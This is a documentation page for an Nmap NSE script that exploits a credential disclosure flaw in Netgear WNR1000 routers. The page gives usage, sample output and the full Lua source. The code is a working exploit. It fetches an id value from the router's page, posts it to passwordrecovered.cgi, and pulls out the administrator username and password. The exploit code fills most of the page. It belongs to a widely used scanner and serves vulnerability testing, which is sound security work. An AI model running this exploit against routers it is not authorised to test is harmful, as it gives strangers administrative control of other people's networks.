<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-vuln-wnr1000-creds</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth,auth<br/>
<b>Author:</b> Paul AMAR <aos.paul@gmail.com>, Rob Nicholls<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-vuln-wnr1000-creds.nse">https://svn.nmap.org/nmap/scripts/http-vuln-wnr1000-creds.nse</a><br/>
<h3>Summary</h3>
<p>A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA</p>
<p>Vulnerability discovered by c1ph04.</p>
<h3>Arguments</h3>
<table>
<tr><td>http-vuln-wnr1000-creds.uri:</td><td>http-vuln-wnr1000-creds.uri</td></tr>
<tr><td>creds.[service]:</td><td>See the documentation for the <a href="nmap/libraries/creds.htm">creds</a> library</td></tr>
<tr><td>creds.global:</td><td>See the documentation for the <a href="nmap/libraries/creds.htm">creds</a> library</td></tr>
<tr><td>vulns.short:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
<tr><td>vulns.showall:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -sV --script http-vuln-wnr1000-creds &lt;target&gt; -p80</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-wnr1000-creds:
|   VULNERABLE:
|   Netgear WNR1000v3 Credential Harvesting Exploit
|     State: VULNERABLE (Exploitable)
|     IDs:  None, 0-day
|     Description:
|       A vulnerability has been discovered in WNR 1000 series that allows an attacker
|       to retrieve administrator credentials with the router interface.
|       Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
|     Disclosure date: 26-01-2014
|     References:
|_      http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip
</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/vulns.htm">vulns</a></li>
<li><a href="nmap/libraries/creds.htm">creds</a></li>
</ul>
<h3>Code</h3>
<pre>local http = require &quot;http&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local vulns = require &quot;vulns&quot;
local creds = require &quot;creds&quot;

description = [[
A vulnerability has been discovered in WNR 1000 series that allows an attacker
to retrieve administrator credentials with the router interface.
Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA

Vulnerability discovered by c1ph04.
]]

---
-- @usage
-- nmap -sV --script http-vuln-wnr1000-creds &lt;target&gt; -p80
-- @args http-vuln-wnr1000-creds.uri URI path where the passwordrecovered.cgi script can be found. Default: /
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-wnr1000-creds:
-- |   VULNERABLE:
-- |   Netgear WNR1000v3 Credential Harvesting Exploit
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  None, 0-day
-- |     Description:
-- |       A vulnerability has been discovered in WNR 1000 series that allows an attacker
-- |       to retrieve administrator credentials with the router interface.
-- |       Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
-- |     Disclosure date: 26-01-2014
-- |     References:
-- |_      http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip
--
---

author = {&quot;Paul AMAR &lt;aos.paul@gmail.com&gt;&quot;, &quot;Rob Nicholls&quot;}
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;exploit&quot;,&quot;vuln&quot;,&quot;intrusive&quot;}

portrule = shortport.http

-- function to escape specific characters
local escape = function(str) return string.gsub(str, &quot;&quot;, &quot;&quot;) end

action = function(host, port)
    local uri = stdnse.get_script_args(SCRIPT_NAME..&quot;.uri&quot;) or &quot;/&quot;

    local vuln = {
        title = &#39;Netgear WNR1000v3 Credential Harvesting Exploit&#39;,
        state = vulns.STATE.NOT_VULN, -- default
        description = [[
            A vulnerability has been discovered in WNR 1000 series that allows an attacker
            to retrieve administrator credentials with the router interface.
            Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA.
            Vulnerability discovered by c1ph04.
            ]],
        references = {
            &#39;http://c1ph04text.blogspot.dk/2014/01/mitrm-attacks-your-middle-or-mine.html&#39;,
        },
        dates = {
            disclosure = {year = &#39;2014&#39;, month = &#39;01&#39;, day = &#39;26&#39;},
        },
    }

    local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

    local detection_session = http.get(host, port, uri)

    if detection_session.status then
      if not detection_session.body then
        stdnse.debug1(&quot;No response body&quot;)
        return vuln_report:make_output(vuln)
      end
        -- gather the id
        local id_netgear = string.match(escape(detection_session.body), (&#39;(id=%d+)&#39;))

        if id_netgear == nil then
          stdnse.debug1(&quot;Unable to obtain the id&quot;)
          return vuln_report:make_output(vuln)
        else
            -- send the payload to get username and password
            local payload_session = http.post(host, port, uri .. &quot;passwordrecovered.cgi?&quot; .. id_netgear, { no_cache = true }, nil, &quot;&quot;)
            if payload_session then
                local netgear_username = string.match(escape(payload_session.body), &#39;Router Admin Username&lt;/td&gt;.+align=&quot;left&quot;&gt;(.+)&lt;/td&gt;.+Router Admin&#39;)
                local netgear_password = string.match(escape(payload_session.body), &#39;Router Admin Password&lt;/td&gt;.+align=&quot;left&quot;&gt;(.+)&lt;/td&gt;.+MNUText&#39;)
                if (netgear_username ~= nil and netgear_password ~= nil) then
                  vuln.exploit_results = {
                    (&quot;username: %s&quot;):format(netgear_username),
                    (&quot;password: %s&quot;):format(netgear_password),
                  }
                  local c = creds.Credentials:new(SCRIPT_NAME, host, port)
                  c:add(netgear_username, netgear_password, creds.State.VALID)
                  vuln.state = vulns.STATE.VULN
                else
                    stdnse.debug1(&quot;We haven&#39;t been able to get username/password&quot;)
                end
            end
        end
    end
    return vuln_report:make_output(vuln)
end</pre>
